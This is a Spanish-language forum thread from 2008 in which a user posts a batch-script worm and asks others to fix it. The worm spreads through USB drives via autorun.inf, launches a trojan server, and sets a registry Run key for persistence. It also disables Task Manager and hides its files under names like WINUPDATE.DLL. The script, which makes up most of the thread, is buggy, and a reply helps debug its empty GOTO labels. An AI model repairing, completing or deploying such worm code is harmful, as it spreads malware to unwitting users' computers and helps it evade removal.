|
Título: ayuda con un worm en batch Publicado por: krlos__gb en 11 Marzo 2008, 22:49 pm hola
me podrian ehcar una manito con este code en batch es un worm que se propaga por las usb e instala el server de un troyano pero lo eh probado y no funciona (compilado a exe y todo con el quick batch file compiler) me podrian corregir los errores porfavor al server del troyano de puse "server_8.exe" porciakaso el codigo no es mio aki va: @ECHO OFF SET WORMORIGINAL=juego.exe SET WORM=1044404.EXE SET AUTORUNORIGINA L=%WINDIR%\14785\WINUPDATE.DLL SET AUTORUN=autorun.inf MD "%WINDIR%\14785" ECHO [AUTORUN] >%%WINDIR%\14785\WINUPDATE.DLL% ECHO open=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL% ECHO shell\1=abrir >>%%WINDIR%\14785\WINUPDATE.DLL% ECHO shell\1\Command=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL% ECHO shell\2\=explorar >>%%WINDIR%\14785\WINUPDATE.DLL% ECHO shell\2\Command=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL% ECHO shellexecute=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL% COPY %juego.exe% "%WINDIR%\14785\SYSTEMSHELL.exe" START %MYFILES%\server8.exe REG ADD HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f REG ADD HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d REG ADD HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f :CHEKARWORM IF NOT EXIST "D:\%1044404.EXE%" GOTO IF NOT EXIST "E:\%1044404.EXE" GOTO IF NOT EXIST "F:\%1044404.EXE" GOTO IF NOT EXIST "G:\%1044404.EXE%" GOTO IF NOT EXIST "H:\%1044404.EXE%" GOTO IF NOT EXIST "I:\%1044404.EXE%" GOTO IF NOT EXIST "J:\%1044404.EXE%" GOTO :COPIARWORM COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%1044404.EXE%" ATTRIB +S +H +R "E:\%1044404.EXE%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%1044404.EXE%" ATTRIB +S +H +R "F:\%1044404.EXE%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%1044404.EXE%" ATTRIB +S +H +R "G:\%1044404.EXE%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%1044404.EXE%" ATTRIB +S +H +R "H:\%1044404.EXE%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%1044404.EXE%" ATTRIB +S +H +R "I:\%1044404.EXE%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%1044404.EXE%" ATTRIB +S +H +R "J:\%1044404.EXE%" COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "E:\%autorun.inf%" ATTRIB +S +H +R "E:\%autorun.inf%" COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "F:\%autorun.inf%" ATTRIB +S +H +R "F:\%autorun.inf%" COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "G:\%autorun.inf%" ATTRIB +S +H +R "G:\%autorun.inf%" COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "H:\%autorun.inf%" ATTRIB +S +H +R "H:\%autorun.inf%" COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "I:\%autorun.inf%" ATTRIB +S +H +R "I:\%autorun.inf%" COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "J:\%autorun.inf%" ATTRIB +S +H +R "J:\%autorun.inf%" GOTO LOOP :LOOP ping 127.0.0.1 -n 60 GOTO CHEKARWORM Bueno espero su ayuda saludos! Título: Re: ayuda con un worm en batch Publicado por: leogtz en 26 Marzo 2008, 07:54 am Solo te diria que checaras esta etiqueta:
:CHEKARWORM IF NOT EXIST "D:\%1044404.EXE%" GOTO IF NOT EXIST "E:\%1044404.EXE" GOTO IF NOT EXIST "F:\%1044404.EXE" GOTO IF NOT EXIST "G:\%1044404.EXE%" GOTO IF NOT EXIST "H:\%1044404.EXE%" GOTO IF NOT EXIST "I:\%1044404.EXE%" GOTO IF NOT EXIST "J:\%1044404.EXE%" GOTO Ya que en el Goto no estas mandando a ninguna parte... Saludos |